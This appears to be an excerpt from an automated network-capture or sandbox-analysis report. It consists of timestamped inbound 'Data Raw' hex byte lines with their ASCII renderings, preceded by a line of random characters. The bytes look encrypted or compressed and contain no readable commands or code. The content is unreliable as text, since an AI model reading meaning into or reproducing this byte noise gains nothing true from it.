0tru.@0$?w+~;Xj3V{Pprk0o<]*'@>XTKbgCM^}_X>&3D\|.=46%]BCOPIDn
2021-11-25 15:51:48 UTC	559	IN	Data Raw: e0 03 36 0c fc 80 1e 9a 43 9d 40 44 0d 67 85 04 b6 26 c9 81 06 da 46 98 30 07 6a 28 46 39 f2 64 72 b7 a8 37 32 05 eb 38 5b a9 4e 6a 38 5e f0 71 b1 ae 97 01 fa b7 42 1a 5e 74 ac 67 92 f8 87 c9 f9 97 84 a9 88 d6 99 49 9e 9d ba 38 f0 ce 8c ac 41 e3 f6 79 e6 44 14 8b 36 2b 2f dc d5 b3 52 9d 31 7d 80 be ab 54 c1 1d c3 90 9a ff 26 66 52 c4 4f 67 1c c2 2a a5 18 74 e6 20 7f f7 77 c3 0c eb 7b f6 73 df dc bd 54 e5 c1 73 d9 3d 62 9c c0 d3 f6 fb 73 1e 7f f8 16 42 2d 7d cb 3e 27 d6 ad 84 8f 99 8b ee 55 12 f2 7f 07 56 0c d4 a7 9f bd 5c 90 09 d9 1c 43 60 9d b9 4d 57 47 51 7b b1 4c ff b6 e8 81 31 bc 02 f7 a0 31 bc 0d 82 73 d1 cb 12 52 cf 31 85 02 56 07 31 b6 fc 35 b1 b5 0e 88 5f 16 7d c9 ee 01 34 3c 2d ae c1 d1 d6 57 aa d0 85 f6 13 0e 5e a1 af 77 6b 5b c5 70 76 46 c8 7a Data Ascii: 6C@Dg&F0j(F9dr728[Nj8^qB^tgI8AyD6+/R1}T&fROg*t w{sTs=bsB-}>'UV\C`MWGQ{L11sR1V15_}4<-W^wk[pvFz
2021-11-25 15:51:48 UTC	560	IN	Data Raw: 90 95 bc eb 08 56 f0 ee 8e 5c 77 93 08 9b b0 c0 2d 84 c6 97 bf 51 4e 75 2e e9 ab 6c bb 6e 2f 2a f2 94 4a c0 ea 43 1c 18 41 5e 9b 41 d5 2c b2 c3 22 6b 00 0b ce 45 13 59 24 a3 3e 2a 10 e1 c4 90 26 6a 48 33 d1 03 3a 07 a3 42 4b 41 cd 4b 87 63 07 3b 50 7e 7d 35 40 26 ea 9d 59 3c b8 54 f6 80 0c 26 35 ba cb e6 5f d1 d7 4f d7 e4 a7 42 d0 3c 7c 19 cf 3f 93 69 bc d2 5f fe 05 32 ef 1d c3 8d 60 02 ec 22 5b 24 69 c0 83 f1 fa 15 fb 89 e5 25 ae 56 cb ca e1 25 a0 b1 2f 92 8a 6c 4b f9 bc 6e 9c b1 f6 e3 2a fd 5b 96 f0 20 8e 53 33 ba f2 5e 2f db dc 5a d4 55 9a ce c1 28 18 fc 03 ac cc 61 d6 ab 59 6f 2f d2 26 61 05 03 cc e5 c6 28 57 6e a1 92 52 0c 30 37 b6 18 2e 07 ae 2a e5 1f f6 26 67 9a 57 f3 c7 16 7d 28 e7 f8 fc 6e 93 75 3a e7 c3 18 70 40 44 7d ca 68 b7 63 3e d4 4c fa 2e Data Ascii: V\w-QNu.ln/JCA^A,"kEY$>&jH3:BKAKc;P~}5@&Y<T&5_OB<\|?i_2`"[$i%V%/lKn[ S3^/ZU(aYo/&a(WnR07.&gW}(nu:p@D}hc>L.
2021-11-25 15:51:48 UTC	561	IN	Data Raw: 89 67 f3 b7 e1 a7 ff 09 60 c5 c8 0e 38 c2 0b cc ca 66 66 b4 11 8a f9 13 2d 3b af db 73 15 7f cf b1 db 91 fb b0 c4 95 0c e1 d7 2b ae c6 6b 9c 3e b7 67 0b d8 36 06 bd 54 b6 e1 cc be e8 9f a0 b0 fb ee e6 cb 86 23 81 ca b7 43 a9 61 e7 29 8b da 37 ea 1e 7f cf 32 ea 8e 94 e7 a1 92 ed 91 21 79 1e 62 eb 07 7d 72 9b 0c 9a 15 3c 69 9a 0f 08 94 16 bc bb d8 90 b5 46 bf 9d e8 cd 0f d4 a8 2e fc 49 a8 2c 11 3c c6 ed 06 47 61 f8 26 6a 10 25 f1 46 ee 61 31 3e d3 cb 5b 9c 6a 36 39 8a 6a 05 3e 42 4c c4 ac e4 ca 16 f6 fe 9d 42 8f f0 6d 3d a7 1f f7 6b cd 4f e5 5a b1 53 4a ca bf 97 98 8d 6f b2 21 bf eb e7 37 0d d9 86 2a 13 5a 96 7f 5a 19 9d 5e d6 d2 b3 4c cc 62 63 32 c9 62 0c 27 2c 55 83 18 be 1b 1a b6 05 c9 f5 68 4f 84 9f 55 8f 68 4f 5e 77 3d 8e f6 ff a2 ce 5a c0 7d 33 75 6e Data Ascii: g`8ff-;s+k>g6T#Ca)72!yb}r<iF.I,<Ga&j%Fa1>[j69j>BLBm=kOZSJo!7*ZZ^Lbc2b',UhOUhO^w=Z}3un
2021-11-25 15:51:48 UTC	563	IN	Data Raw: ef 08 de 5e 9e 0a 46 c0 e2 80 2f 3e 2d 72 22 22 e4 b8 06 b6 1f b0 ff 17 37 4b 10 1a 39 82 41 68 5a 1a d4 a6 22 63 f8 08 2f 36 07 dd 34 03 b4 77 48 8d 9b b2 f1 e7 35 d4 91 13 9c 9d c6 95 b6 79 34 28 82 73 20 44 50 03 a9 aa 3c c7 97 6e 5c 77 d1 37 b6 69 b6 6c f1 cb d7 12 5a 0f b8 2b 70 bd 5d e1 0a 93 a4 20 80 b0 34 e0 7d 5a ea 7a 5b f4 fa 83 ce bb 50 7c d7 a1 fc d6 a6 15 f0 83 03 bc d2 b6 c5 96 8c 22 62 8a 6a 83 1c 5b 8b e0 69 06 4e 04 3c 1b f8 1a c9 9c aa 9f 7c 10 54 f9 76 a0 b7 46 df ec dc 83 60 26 5b e7 39 5f 94 f5 7a bb 67 0f d7 bd eb 7b 32 28 98 3b aa e0 c1 94 97 06 ee 0b 72 ad 56 1e 65 f0 8e 72 04 68 4f 57 2e 02 85 c9 f7 63 70 9b be e9 00 78 0f 51 fb 0d 64 df e7 cf 3e d9 0e e9 c7 14 68 2d 04 25 a8 f7 c5 1b f6 90 88 29 4d 1b f0 60 7f ad c6 0f 50 09 7e Data Ascii: ^F/>-r""7K9AhZ"c/64wH5y4(s DP<n\w7ilZ+p] 4}Zz[P\|"bj[iN<\|TvF`&[9_zg{2(;rVerhOW.cpxQd>h-%)M`P~
2021-11-25 15:51:48 UTC	564	IN	Data Raw: 3f 3e c5 6a 86 75 37 51 7d fc 32 f9 6f f0 68 83 f4 92 91 c2 a3 b5 72 aa 3e 43 6d b0 53 f7 74 f5 1f 9e 9e ee 9d 48 3a bb ed 1e f3 18 01 74 a6 2c 1d 1c 96 0a 00 1a b0 5b e5 5c 0e c2 c8 86 49 45 6a 54 90 80 84 f3 94 ac 4e 01 f5 a9 cd 8a 34 99 c0 d6 ac 29 82 4b c1 9a 9e de 19 4b 57 87 0e 5c 7e d3 3f 3f 2d 01 5e 54 c4 97 87 03 2a 13 3d b5 dd 8f 72 1e e1 06 c9 56 da 99 82 c4 e8 d0 7e a7 3f 9b 3c a3 27 b2 b4 f8 1f fb 69 26 64 68 54 fd 78 a3 cc b0 c8 bb e3 49 dc 1d 86 2f b2 ca 62 0c a2 3f a4 87 16 ba f1 00 73 98 05 00 85 09 14 ba 6c 55 8b 75 68 8b 64 11 30 e8 7d 59 e0 0d 7f fa 26 62 74 bf f9 66 60 2a 11 e8 72 6e ba 44 28 f8 f0 6f c2 e8 66 b2 f9 a9 c2 08 30 44 d2 a1 a8 e6 aa 26 fd 6b 25 d2 64 9f 07 0e a4 16 4e 44 e7 39 86 41 e9 67 fa ff 3c 25 ea 73 d4 c2 a1 70 b7 Data Ascii: ?>ju7Q}2ohr>CmStH:t,[\IEjTN4)KKW\~??-^T=rV~?<'i&dhTxI/b?slUuhd0}Y&btf`rnD(of0D&k%dND9Ag<%sp
2021-11-25 15:51:48 UTC	565	IN	Data Raw: 46 9d 83 f5 92 93 6e 8b ab 64 8b ef 7b 86 36 64 b3 75 3d 50 00 c3 65 03 01 e0 4c f3 7e 07 62 de 5e a8 30 ea 24 fd d7 32 53 4f 72 56 fa 1e 49 57 f4 f7 1b a3 2b 72 51 3a 35 81 fb 0b 71 34 56 ed c7 f3 0b dd 93 a1 a2 2e ea 68 8b 6a e7 a8 86 7a 64 75 a8 87 f8 23 ea fa 44 fd d4 ac ed 19 31 8d e9 64 6c 48 83 85 c9 0f 46 3d b6 3b 9a 36 3c aa 97 6c eb 89 e8 98 15 51 f5 08 4e ac 59 09 22 f5 7a 8c 96 9c d1 6f d3 6b 01 06 bd 67 82 aa b5 c5 29 a0 3d 90 88 9f 4e ce 80 45 62 05 23 11 d4 94 70 a9 50 4c 25 0a 92 19 fd 85 a9 1f aa ef e8 8c d5 1b 05 03 c3 92 2e 8d 5b 2c 9c be ff 61 01 0c a1 ae fb d9 6e ca 8e 28 f7 88 fd 62 94 a6 18 82 11 5c 79 88 eb 96 e5 2d ac 2d 73 5d 81 5a ef ed fe 38 d1 58 e4 40 29 a0 b0 7f fd 19 43 0a e8 1e 77 e3 33 9a 8d 0a c5 bb 32 f8 36 34 02 b2 c8 Data Ascii: Fnd{6du=PeL~b^0$2SOrVIW+rQ:5q4V.hjzdu#D1dlHF=;6<lQNY"zokg)=NEb#pPL%.[,an(b\y--s]Z8X@)Cw3264
2021-11-25 15:51:48 UTC	567	IN	Data Raw: 1a 7e a5 bf 57 9d 15 04 b3 f8 1f 5b 94 bf 69 d6 d2 8d e1 f9 92 8d 76 1e e8 39 8c 61 fd 99 bd 27 0d 98 30 f6 f6 16 76 5f 2c 9a 91 c9 f7 c7 16 44 3a d2 8f 90 1b f4 9c 7b 4f 2d 99 bc 86 e2 75 e1 f8 ad ae a1 5e aa d3 0d 23 12 b5 73 2c 2f 82 ed a0 cc cf 05 37 49 b0 2f bb 6c 83 fc 88 e2 02 dd d3 30 00 60 81 6d ca ee 60 76 41 65 39 84 f7 39 8d 09 5b 11 ed f3 dd 63 35 3b ff 1d bf 5e 95 69 58 db 2f 7f 22 5a e3 fd 8f 00 0e 11 8b a4 25 ef 56 eb 43 5b 51 28 4f 44 e4 ba be 0a c0 65 3a 24 70 00 86 e0 b9 52 ff ba fe 05 a0 78 1b a0 30 3f 54 95 86 93 6b cc 8d e5 c3 20 ec fa 52 96 4f 7e 71 cf 5d 20 96 0a a4 b5 4c 3f fb 80 7f cb a2 bd 6d 05 38 da 5c 93 94 34 03 be 1b 74 ad c1 8e 40 22 5e 91 98 ed e8 76 b9 12 6f cd 7c 4f 4b 4e 06 47 5d 90 89 b5 7e 24 55 63 f9 82 7b 7b f3 0a Data Ascii: ~W[iv9a'0v_,D:{O-u^#s,/7I/l0`m`vAe99[c5;^iX/"Z%VC[Q(ODe:$pRx0?Tk RO~q] L?m8\4t@"^vo\|OKNG]~$Uc{{
2021-11-25 15:51:48 UTC	568	IN	Data Raw: ba 92 a8 d6 2f 1b b8 43 5f 2b 99 61 1b fc b2 c6 3c 16 c8 1e 3f cf 86 48 f9 21 d9 92 83 75 50 a8 b4 58 ed ff 63 17 4e 11 23 39 b0 f0 55 fb e4 7f f9 9d 84 f5 02 a1 7c 20 fc 80 27 53 45 5d f0 bd d8 2f 7f 9f 5f 46 e5 c9 0c aa 54 38 2f 3a 08 9b b0 c0 72 56 09 1a 4f 44 e4 d2 d8 5a de 6b 38 0b 29 fe f8 2f 82 73 28 24 dd 31 73 63 05 0a ad 0d bc be d1 31 75 71 11 67 37 47 73 60 ed fe 0a 24 f5 d2 2e 48 f6 26 b6 ef 7e b4 06 fe 3c 22 52 79 2b be ab 65 3f ab d8 37 02 5f e1 ce 89 d6 90 47 3f fd 8f 93 22 65 fa f2 26 1c 73 2e 9c c8 68 e0 60 a7 99 16 d6 e1 b3 12 5a e1 76 59 84 0e 0a 9e 3c 16 ca 6e 2c f0 9e 07 a0 c0 1c 32 0b 20 44 50 78 da bc 0d 29 98 ff 9b b4 b5 65 9d 86 7a aa bb e4 bc 89 57 6a 37 43 19 5c 80 e6 4c 59 69 01 85 bc 05 7b c2 a5 6b 5a 11 b2 cb ee 7a 67 21 8a Data Ascii: /C_+a<?H!uPXcN#9U\| 'SE]/_FT8/:rVODZk8)/s($1sc1uqg7Gs`$.H&~<"Ry+e?7_G?"e&s.h`ZvY<n,2 DPx)ezWj7C\LYi{kZzg!
2021-11-25 15:51:48 UTC	569	IN	Data Raw: ac c0 44 0e 71 f4 bd 43 00 5e bf 90 a7 74 0b b2 3a 3b 39 1d 62 7d 75 66 7d 29 5c 3c 77 f3 49 26 99 00 fb f6 a5 a4 7c 83 5d 23 f1 65 c1 4d f0 a8 00 23 41 d0 89 c3 13 5e d3 32 ab 36 43 45 9f 35 c4 ca ea 7f 31 aa ac db 42 bb de f1 6b d9 18 17 00 2c 43 ba 96 bb a5 0d 1b 0d 82 96 38 5b 62 91 f5 1a 82 6a 25 a4 37 9e 72 cb d2 a4 05 97 a2 a8 9a 0e 57 c1 16 d5 23 f1 61 21 03 19 7a eb 01 e3 40 03 ac 21 7b 9d ff 30 c3 1e 01 8e 33 91 a8 0f ad c5 5b 01 f8 b1 b2 4f 93 84 21 82 8c e9 fd 3f a0 8e 6a b3 17 ba 59 4e 5e a4 56 e4 79 45 ce ca 1a f5 7a 01 43 7b 93 0d ce f7 ae 62 81 9c c9 95 b0 19 e6 92 af f8 eb 85 20 e5 10 67 cc bb ce b8 79 0c c2 4e 7f 34 2d 5d 18 71 63 23 46 fb 0a ff 87 93 92 8f 36 07 8b fd 69 5d f2 99 13 2b 66 ee b2 85 bb 76 b9 68 0d 5a 61 3d a1 fe ff 3a 1a Data Ascii: DqC^t:;9b}uf})\<wI&\|]#eM#A^26CE51Bk,C8[bj%7rW#a!z@!{03[O!?jYN^VyEzC{b gyN4-]qc#F6i]+fvhZa=:
2021-11-25 15:51:48 UTC	571	IN	Data Raw: d8 45 b0 fc f8 9c b0 36 d9 4e 26 6d 0c 4d a7 9f 4e 63 93 72 5d 08 6a 83 f8 f9 48 f3 41 5f eb 08 ce 6e a8 d3 bb f9 3e 58 ac b0 c0 ed f3 1b e4 48 44 b2 f5 c4 23 9a 3a d7 35 f7 6a 3a 83 2e 22 ea 96 57 89 ae 43 d0 55 df ed 6d a5 f7 3e c0 d6 ac 55 22 cd 72 da a3 2b d3 f4 ba c6 97 58 81 52 bc b6 04 82 fa 9d 5d f9 d5 d9 dd 80 a6 d3 7b 3e d5 23 1a bc ef 1d 05 07 c9 fb fb bd 5f 13 4e 1d 1d 8c 5f 17 c3 99 91 69 61 07 0e 56 de 34 e7 9e aa e0 6c ba a4 01 b7 7b f0 83 fc ed 95 13 3e 1c d0 2b 39 0e 67 44 27 7c 05 ac 5e d2 9c 17 f2 69 b2 86 d9 cf 3e 11 3f c5 28 4d 12 ce 2b 72 fe 98 14 31 7b c9 c7 b6 d8 e6 1a 0c a3 da c7 d1 89 ca 02 4e a4 cc d1 09 27 e7 ce 32 8b 32 6b 8d d0 8d e8 7e c0 03 c0 ee 5c a0 08 36 83 05 c7 16 71 29 a4 6d f5 c8 83 f0 9f a5 93 c3 fe 4e c6 93 61 50 Data Ascii: E6N&mMNcr]jHA_n>XHD#:5j:."WCUm>U"r+XR]{>#_N_iaV4l{>+9gD'\|^i>?(M+r1{N'22k~\6q)mNaP
2021-11-25 15:51:48 UTC	572	IN	Data Raw: 95 31 c1 4d d8 a7 ac 47 18 2a f1 dc 6c 3d f4 b5 e3 c2 9b 13 47 de 14 9b 73 21 d8 2e 59 36 dd e0 6d ab 1d 7c 85 fb b3 c0 b4 35 2b 98 0b a3 fb ee 6f 16 49 cc d3 46 e5 c5 2e 95 c0 ce b6 f4 17 42 8f b3 46 d8 ab d2 fe 76 5c a3 a3 32 55 fc 74 a4 10 a9 4b 91 51 66 10 51 79 dd 7d cb c0 8c 59 5b 12 6c 19 c6 45 41 be d5 1b f9 33 11 19 d7 24 54 fb 80 e0 cf cd 20 34 34 35 84 a5 e1 61 0e 39 51 a4 b9 4d 42 e0 5f 1a 4b df 59 e6 d9 3e 68 ee a9 12 69 19 78 cc e7 4c 2e 4c 25 0b 1a cf bd ec 9c 9b b1 a7 dc 0b 59 5a dd 2a da 96 f9 95 0e f9 2a fc fd bf 58 ec 49 a8 bd dd 76 6e cf d9 34 67 af 2a 9c 0d c0 19 ff 67 86 7c bf 69 35 94 0c 93 3d 30 e5 5a e0 db 2f 64 83 f1 e9 c6 0d 22 7f 3c cd 9a bc bf ea 7a d9 6a 36 7d c8 b8 0d d8 aa ec 45 52 f8 e7 fb 5a 8f 71 32 3f 43 fa 13 4a ad 62 Data Ascii: 1MGl=Gs!.Y6m\|5+oIF.BFv\2UtKQfQy}Y[lEA3$T 445a9QMB_KY>hixL.L%YZXIvn4gg\|i5=0Z/d"<zj6}ERZq2?CJb
2021-11-25 15:51:48 UTC	576	IN	Data Raw: 44 35 2a 9b 33 2c 22 ea ec ff 1c eb 60 0f 91 77 a8 d3 3a d8 c0 25 0a c0 de b2 bb 67 08 91 7a a8 70 93 a4 26 e4 be 09 a3 93 ac d0 2a 9f f1 1c 38 39 b1 b9 9f 0e 63 0e 67 f8 63 a5 a2 1b f8 ff 66 30 30 07 33 61 ef a4 22 5b 1b 07 d4 3e 19 fa 26 89 10 6b 3a 31 89 11 3f e1 f8 1b f4 ef c8 c4 97 8b ef 13 58 1e 87 95 8e f2 94 59 6f 29 9d 4a ea 73 2f 83 f6 de 3e 12 a7 4c cf 05 0a 50 5b 19 fd 2e 0a 4e 0a 6c 39 bd 67 4e fb 69 d2 6e 3e 2b af a5 33 dd 0b b3 d3 35 57 81 f7 9f 8f 74 90 ae c1 13 d0 23 5a e2 a1 4f 24 fd 28 8b 7f 53 37 d6 c5 2b 95 7f d4 3a f0 f2 2a b2 6e 49 aa 69 03 0e 5f c6 0d 17 70 5b db f8 4f 7e 38 35 1a d3 8d 5e 64 6a 1a 4d 79 ef 79 54 78 08 8e 07 31 89 19 de 58 0c 85 41 64 86 70 3c a6 61 c8 fa 25 e5 38 ca 24 6b 31 89 0b c2 2b af 4f 77 6c b8 f7 af 44 57 Data Ascii: D53,"`w:%gzp&89cgcf003a"[>&k:1?XYo)Js/>LP[.Nl9gNin>+35Wt#ZO$(S7+:*nIi_p[O~85^djMyyTx1XAdp<a%8$k1+OwlDW
2021-11-25 15:51:48 UTC	580	IN	Data Raw: 5b 10 b4 1a 7a e7 fa 80 c2 cc 61 12 55 56 76 16 c6 f8 1b f6 f3 87 6b 8f 79 7b 3b af df 7e c7 93 ce ba e5 f2 60 8c fa 1e 4a c6 60 8f 9e 80 a6 1c 98 80 0b 13 be ea 41 3a fc 0b 1d ce 54 98 3e 91 79 49 ac 5f 94 1b 14 95 31 72 16 de d4 5c c0 71 d6 03 34 94 89 bf 34 10 59 5d 2a 75 45 c7 56 d2 a2 2e 03 c4 6b 37 10 61 88 e0 0c 76 3d a1 a8 4c 83 92 71 29 92 f1 53 4a 38 25 65 a6 d6 19 3d 9c a2 8c e7 75 2f 4c 5c 3c bf e6 13 fe 6a 83 f8 74 3d a8 e8 7d 3c 45 6f 82 92 2e f5 2c 2f 0b af 0e 59 07 32 32 ed 90 24 fc 90 80 2a 0f 40 d9 6a 4a 83 f4 91 44 b4 79 52 0b 8a 5e 67 fd 8c 93 6e af ba 16 79 3e ce b8 4f 40 c1 f9 9b 2d 55 37 38 8f f0 92 4a 08 2a e9 62 b4 47 3c cc 85 ff bd 9c bb 52 b0 4f 0b 1c 73 c4 7a c8 0a 3f 2c 48 27 f6 2d 97 11 34 87 b7 f1 75 9a c1 79 dd d0 5c 76 63 Data Ascii: [zaUVvky{;~`J`A:T>yI_1r\q44Y]uEV.k7av=Lq)SJ8%e=u/L\<jt=}<Eo.,/Y22$@jJDyR^gny>O@-U78J*bG<ROsz?,H'-4uy\vc
2021-11-25 15:51:48 UTC	583	IN	Data Raw: 23 df d4 5a 88 ff 2a d7 02 46 76 5b 13 d0 1e e9 48 04 2c 43 e9 6a 48 ba 1b ca 89 dd 4a 8c f5 e5 fb 8d 1b e7 22 79 d5 98 ed 0c 59 98 3b aa e0 f9 a8 2e 80 07 b8 1d 13 24 68 b3 40 b9 36 4a bc dc 53 db d4 5e 6a 85 c1 1e 41 cd bb 53 99 ec 81 c6 9d b6 7c de 10 5e ae cc 8f 61 e2 a8 e6 78 60 06 ee f6 63 02 ba f6 74 33 6d d9 db d6 9c 3e b7 38 dc 7a 6d 06 07 06 4a e8 91 9b 81 fd 1c fe 43 ee 40 2d 93 6e 43 a1 91 93 aa 56 b9 2d e3 fc 0c 46 c9 ca 29 5c bb 98 ab 58 e4 71 8d 6a 0a 75 47 4a 72 3d 5a 18 bb 54 fe 39 3f f1 f4 65 0f e6 a3 b6 fc b1 a5 de aa 3c 17 f2 52 47 66 60 15 ab df 2b 74 52 8a 67 0c 37 e6 d1 1c 75 e8 ab 4c 65 06 40 ca 75 4f e3 32 35 50 f3 ed fa 86 f6 03 de a7 6b 0f 60 a7 c3 fc f1 5e a1 19 cd 1a bb 9c 9e 35 04 b6 e8 83 08 04 87 2d a4 45 b2 32 aa ef 5d 17 Data Ascii: #Z*Fv[H,CjHJ"yY;.$h@6JS^jAS\|^ax`ct3m>8zmJC@-nCV-F)\XqjuGJr=ZT9?e<RGf`+tRg7uLe@uO25Pk`^5-E2]
2021-11-25 15:51:48 UTC	587	IN	Data Raw: a8 13 98 a3 ab 5f 12 63 83 12 bf 5d 2b 9b bc 70 1c 9d 89 dc 56 d5 21 b3 e1 bd 5e 93 3d ad 5c a1 a0 c9 ec 76 52 fa 1b 50 f5 12 37 54 c4 a9 5f 2c 14 02 5c b2 f2 63 b0 0c 47 c0 9c 8e 15 4f 6d cf 1b f6 4c 0a d2 8d dd 2a e6 65 ae f7 15 8b e8 00 bc e5 7f ce 10 69 df 28 1c 7d f5 99 19 54 a2 8a 41 68 b8 1d d2 b3 70 a7 a2 a9 b3 a7 9b 8a 6d 0f 45 09 e4 3f 93 96 f9 6a 8f a6 2c 2b 7b ae 3c af 0d cc aa da 9a b6 f6 e7 4a ec 17 3e 2b a8 ec 75 d2 36 b2 3b 4c ff fb 81 f3 71 79 68 c6 9b 8b 1b 00 8d e6 74 a0 b2 3d 2f 05 bb 3b fc e7 cb 3d 48 d2 35 55 58 13 cd 09 d8 7f cd 07 07 f9 ff 3a 1a 7d b6 f9 08 4a 2c 2c 21 ea 46 32 fc 01 3a 07 30 f5 6c 24 57 66 bc 52 01 e0 c5 19 f8 1b 17 3c ba fa 2c 10 ab a4 a9 6e a8 ea ef fa fa 23 d3 3f a6 29 de ba da 97 80 bb 92 11 41 a1 d5 15 f8 15 Data Ascii: _c]+pV!^=\vRP7T_,\cGOmL*ei(}TAhpmE?j,+{<J>+u6;Lqyht=/;=H5UX:}J,,!F2:0l$WfR<,n#?)A
2021-11-25 15:51:48 UTC	591	IN	Data Raw: 5a 77 90 57 07 0a 9e d6 35 d8 27 6c fa 4e 01 02 b7 92 44 35 d4 57 9b e1 c7 e4 0a 9e 32 32 fe f7 9d 00 6b a5 f0 bb bc e1 f5 02 0b 1c ca 84 ec f8 49 0c 61 38 30 a8 19 2b 74 66 b9 7e 45 e8 73 a4 cc 6f b3 21 0a 7e 7b f7 ae ca d6 85 13 ef e3 32 35 63 05 39 b8 5b 2f 02 ec 82 58 df d5 dc a9 82 4b 41 68 29 1d b6 d0 52 f8 17 25 b0 2e 12 88 84 31 bb 96 e3 f6 2d 95 22 d6 4e 52 07 9b bd c3 14 d1 b5 2c f0 b7 42 df 66 90 0a e3 c5 b8 c2 2e 39 39 35 53 8e 90 5e 39 66 8d e8 c6 8f 75 38 16 e8 44 74 97 07 ac 26 94 83 bc 77 05 08 a0 d3 26 bd 88 ad 6b de a7 67 ad 86 83 13 d9 25 5d d6 48 3a 0e 64 2a d4 4a 37 85 f6 a1 7d 38 cd 04 81 49 86 9f 51 f7 96 bb c1 ed 00 07 3f 04 25 13 2f 19 f9 3f 35 4a 3a b5 7d 7e 40 ca 9c 90 23 6d b4 ee 61 0c af 42 51 92 4f f9 f3 6a 2e d9 39 21 0b 7d Data Ascii: ZwW5'lND5W22kIa80+tf~Eso!~{25c9[/XKAh)R%.1-"NR,Bf.995S^9fu8Dt&w&kg%]H:d*J7}8IQ?%/?5J:}~@#maBQOj.9!}
2021-11-25 15:51:48 UTC	595	IN	Data Raw: d4 d0 46 ef 1d 6c 46 4a 7b 4b f7 96 9c d8 49 d0 35 ff 17 66 80 75 3f 30 ea e3 5a b2 a9 fa 27 dd 5c c8 ad ea 7b f0 83 b7 9e 52 6b 09 1f b2 77 27 14 6d 99 b8 06 4a e7 57 eb b9 93 2b e9 f8 f0 79 ee 81 ea d2 3e c8 13 df 28 a2 24 f1 70 2b c2 98 3e 25 da 26 26 89 54 ff 86 85 e9 c7 18 59 9e d5 22 9c 94 0d e9 97 9d fd 3e f5 78 d6 a0 0d 49 48 08 0b c3 76 ee 6a 87 91 a0 31 89 d6 09 2e 65 88 60 9c 31 25 02 8b 3e e5 08 cf 93 d4 57 55 3c 17 3a 95 87 10 f6 15 25 cb 31 bb 67 03 a6 ad c0 a1 36 88 52 c2 78 2e 0e 63 37 b7 82 6a d2 f1 5d 2d 6d cb 57 ff 60 aa 01 91 cb df 65 32 03 99 be 04 a4 1c ea 9e 5a d2 88 67 03 65 a5 87 fc 33 75 bb e8 fe 93 81 f2 59 6c 8a ee 94 4f f3 f7 30 ab ad 05 4e 94 4f ad 5e e8 14 cc 61 5e 60 db 58 d5 16 34 89 69 f8 19 78 63 33 bd 60 63 f7 be d4 ae Data Ascii: FlFJ{KI5fu?0Z'\{Rkw'mJW+y>($p+>%&&TY">xIHvj1.e`1%>WU<:%1g6Rx.c7j]-mW`e2Zge3uYlO0NO^a^`X4ixc3`c
2021-11-25 15:51:48 UTC	599	IN	Data Raw: 9e 08 32 97 6f 7c b4 19 c0 0b 77 7b 4b 8f 9a dc 48 fc ed 5c a4 24 5f a8 0b e5 cd f5 1e 7d cd 36 ab d0 42 79 dd b3 41 51 79 d9 33 fd 8b dc 59 0f d8 a4 12 55 9e dc 55 00 78 5c 99 85 cf 31 e3 29 95 1b fd e5 3e 79 5a d4 96 36 c4 1e 4c 1e 3b 18 7f dd fa 2e 9c 35 fd 7f cb 04 82 93 98 0f 71 98 f5 a4 ad f9 28 f7 e7 50 51 d8 45 54 6e 0f 6c 59 56 7a e2 fb 75 e6 c9 b0 48 37 87 63 bb e9 09 2a 1c db e9 96 fa 6f b3 78 10 dc ac d0 b1 f5 7e be ee 6d 9a f1 0f d9 a3 0f dc b8 72 a0 74 75 35 80 73 9c 3d 5b f4 60 c3 d6 48 f1 70 1d f9 67 af 4e b1 89 0a ad 5b b5 4e 9d 45 68 ba cb 31 81 ad ce 5c 9a 3b 1e e1 24 96 0c b6 04 ee c9 34 09 1e 69 d1 0f e8 4a 92 22 98 ff b2 a0 4c c9 98 0f 22 97 be 77 51 99 67 54 75 2b 2e 55 81 48 80 a8 78 69 af cb 4c 2a ea 71 24 91 8d 63 ef ff 88 99 41 Data Ascii: 2o\|w{KH\$_}6ByAQy3YUUx\1)>yZ6L;.5q(PQETnlYVzuH7cox~mrtu5s=[`HpgN[NEh1\;$4iJ"L"wQgTu+.UHxiLq$cA
2021-11-25 15:51:48 UTC	603	IN	Data Raw: 53 f7 7c b8 ff bb 9d b4 f9 71 15 6f 17 54 79 9d f5 18 45 5e 75 e9 c4 6e b5 76 bc e4 43 c5 83 7a a0 60 1d 9b 77 ba 58 2f 66 24 f9 6d a5 43 bf 56 07 8b 7a a0 d9 26 5b fc 85 cf bb 5a 50 ff 05 bb 2c 67 82 7e 70 42 db e9 00 e1 b0 30 30 00 1a cc 1c 95 dd 59 02 77 c9 a8 1e 9e 9d 38 d0 8b 19 61 87 f1 01 07 d3 35 87 09 1f 45 69 a5 29 d9 8b 64 8b d1 32 03 dc 3c 21 d6 a7 27 76 c4 7d 98 89 8a ad 3d 0e 86 9d 0a 3f 42 5e 71 d0 b0 2e b9 f0 96 eb ca 84 99 15 f4 93 9d 01 3f 20 f0 29 6d ad 59 5c 7b b1 42 29 f2 5c 65 02 85 6d bf fa f5 cd 8e 0f 12 32 a1 7a af e7 53 8d da 53 99 88 9f 13 5b fd 09 2b af b1 72 9b 48 f4 a0 0e c6 04 ee f2 fa 29 a7 59 5a ea 8b f6 13 33 8a 51 ee e3 44 36 6f a0 2c ca c1 b9 76 9c 66 36 44 29 62 00 6b 38 0d a3 30 86 96 4d ce a8 18 17 65 09 c4 7f 44 2c Data Ascii: S\|qoTyE^unvCz`wX/f$mCVz&[ZP,g~pB00Yw8a5Ei)d2<!'v}=?B^q.? )mY\{B)\em2zSS[+rH)YZ3QD6o,vf6D)bk80MeD,
2021-11-25 15:51:48 UTC	608	IN	Data Raw: b2 82 9f f1 5d 2b dc c1 6f 2f 7b 42 2f 6b 6f bc ab 1d c4 d4 6d eb 0d 73 83 08 9d a7 a0 38 a5 f9 f6 2b 02 89 55 64 80 62 a1 44 55 19 eb c3 ef 8f b8 3e 6f e1 06 49 b7 3f 1c fb be 44 4d 90 b7 88 b0 39 d1 cf 71 0b aa 4b b1 81 10 89 e2 7d 24 f3 a1 b5 b1 29 84 e8 43 eb b4 b7 93 4f 70 0a c0 7c 2f 9a 82 a5 2c 95 79 20 99 93 b3 1f 48 34 88 e5 04 89 27 84 d4 98 74 45 f4 b4 25 85 da 5c 61 74 e1 36 0a 28 48 7a ed e3 04 32 cb a4 a5 b0 5e 4f 4d 33 34 29 23 ec d7 25 2f c7 73 bd 55 d6 8e e6 38 7c b5 c0 13 59 f0 8c 4f d5 af 57 45 d4 9d 03 78 fa 6e 3a 1b 22 94 5c 18 20 09 36 c1 b0 68 2f cf bd 11 1e a4 c8 13 f3 85 e6 b7 ee 48 ba 61 be 5f 70 44 bd a0 71 64 a5 b7 ba ca d3 27 cc cc 5b 39 65 bc 68 32 b9 3e b3 1c c6 74 3f 88 